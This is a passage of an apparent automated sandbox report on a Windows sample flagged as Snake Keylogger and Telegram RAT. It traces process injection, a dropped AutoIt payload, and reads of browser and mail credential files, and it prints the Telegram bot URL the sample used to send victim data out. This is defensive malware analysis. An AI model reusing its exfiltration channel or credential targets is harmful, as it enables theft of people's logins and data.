                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002B3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_002B3B3A
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002E5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_002E5A7C
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002B4B37 LoadLibraryA,GetProcAddress,0_2_002B4B37
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0116A7B8 mov eax, dword ptr fs:[00000030h]0_2_0116A7B8
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0116BE18 mov eax, dword ptr fs:[00000030h]0_2_0116BE18
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0116BE78 mov eax, dword ptr fs:[00000030h]0_2_0116BE78
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_00F6E4F0 mov eax, dword ptr fs:[00000030h]2_2_00F6E4F0
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_00F6E490 mov eax, dword ptr fs:[00000030h]2_2_00F6E490
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_00F6CE30 mov eax, dword ptr fs:[00000030h]2_2_00F6CE30
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 6_2_01B403A8 mov eax, dword ptr fs:[00000030h]6_2_01B403A8
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 6_2_01B41A08 mov eax, dword ptr fs:[00000030h]6_2_01B41A08
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 6_2_01B41A68 mov eax, dword ptr fs:[00000030h]6_2_01B41A68
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_003080A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_003080A9
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002DA124 SetUnhandledExceptionFilter,0_2_002DA124
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002DA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002DA155
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0004A124 SetUnhandledExceptionFilter,2_2_0004A124
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0004A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0004A155
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Maps a DLL or memory area into another process
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B11008Jump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 11F0008Jump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_003087B1 LogonUserW,0_2_003087B1
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002B3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_002B3B3A
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002B48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_002B48D7
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_00314C27 mouse_event,0_2_00314C27
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\6BRa130JDj.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Allene\ectosphere.exe "C:\Users\user\AppData\Local\Allene\ectosphere.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Allene\ectosphere.exe" Jump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_00307CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00307CAF
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0030874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0030874B
                Source: 6BRa130JDj.exe, ectosphere.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: 6BRa130JDj.exe, ectosphere.exeBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002D862B cpuid 0_2_002D862B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002E4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_002E4E87
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002F1E06 GetUserNameW,0_2_002F1E06
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002E3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_002E3F3A
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002B49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_002B49A0
                Source: C:\Users\user\Desktop\6BRa130JDj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ectosphere.exe PID: 2848, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2804, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ectosphere.exe PID: 2920, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6148, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ectosphere.exe PID: 2848, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ectosphere.exe PID: 2920, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6148, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: ectosphere.exeBinary or memory string: WIN_81
                Source: ectosphere.exeBinary or memory string: WIN_XP
                Source: ectosphere.exeBinary or memory string: WIN_XPe
                Source: ectosphere.exeBinary or memory string: WIN_VISTA
                Source: ectosphere.exeBinary or memory string: WIN_7
                Source: ectosphere.exeBinary or memory string: WIN_8
                Source: ectosphere.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4526688861.000000000043A000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4529175077.0000000002D6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ectosphere.exe PID: 2848, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2804, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ectosphere.exe PID: 2920, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6148, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ectosphere.exe PID: 2848, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2804, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ectosphere.exe PID: 2920, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6148, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ectosphere.exe PID: 2848, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ectosphere.exe PID: 2920, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6148, type: MEMORYSTR
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_00326283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00326283
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_00326747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00326747
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_00096283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00096283
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_00096747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00096747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting                		2
                Valid Accounts                		2
                Native API                		111
                Scripting                		1
                Exploitation for Privilege Escalation                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		4
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Valid Accounts                		2
                Valid Accounts                		3
                Obfuscated Files or Information                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron2
                Registry Run Keys / Startup Folder                		21
                Access Token Manipulation                		1
                DLL Side-Loading                		NTDS127
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection                		1
                Masquerading                		LSA Secrets231
                Security Software Discovery                		SSH3
                Clipboard Data                		15
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                Registry Run Keys / Startup Folder                		2
                Valid Accounts                		Cached Domain Credentials11
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Virtualization/Sandbox Evasion                		DCSync2
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588367 Sample: 6BRa130JDj.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 2 other IPs or domains 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 52 10 other signatures 2->52 8 6BRa130JDj.exe 4 2->8         started        12 wscript.exe 1 2->12         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\...\ectosphere.exe, PE32 8->26 dropped 58 Binary is likely a compiled AutoIt script file 8->58 14 ectosphere.exe 2 8->14         started        60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->60 18 ectosphere.exe 1 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\ectosphere.vbs, data 14->28 dropped 62 Multi AV Scanner detection for dropped file 14->62 64 Binary is likely a compiled AutoIt script file 14->64 66 Machine Learning detection for dropped file 14->66 72 2 other signatures 14->72 20 RegSvcs.exe 15 2 14->20         started        68 Writes to foreign memory regions 18->68 70 Maps a DLL or memory area into another process 18->70 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 api.telegram.org 149.154.167.220, 443, 49749, 55432 TELEGRAMRU United Kingdom 20->36 38 checkip.dyndns.com 193.122.6.168, 49704, 49707, 49709 ORACLE-BMC-31898US United States 20->38 40 reallyfreegeoip.org 104.21.80.1, 443, 49705, 49706 CLOUDFLARENETUS United States 20->40 54 Tries to steal Mail credentials (via file / registry access) 24->54 56 Tries to harvest and steal browser information (history, passwords, etc) 24->56 signatures12

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                6BRa130JDj.exe75%ReversingLabsWin32.Spyware.Snakekeylogger
                6BRa130JDj.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Allene\ectosphere.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Allene\ectosphere.exe75%ReversingLabsWin32.Spyware.Snakekeylogger

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                		104.21.80.1
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		193.122.6.168
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:42:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20376483%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          		high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            http://checkip.dyndns.org/false
                              		high
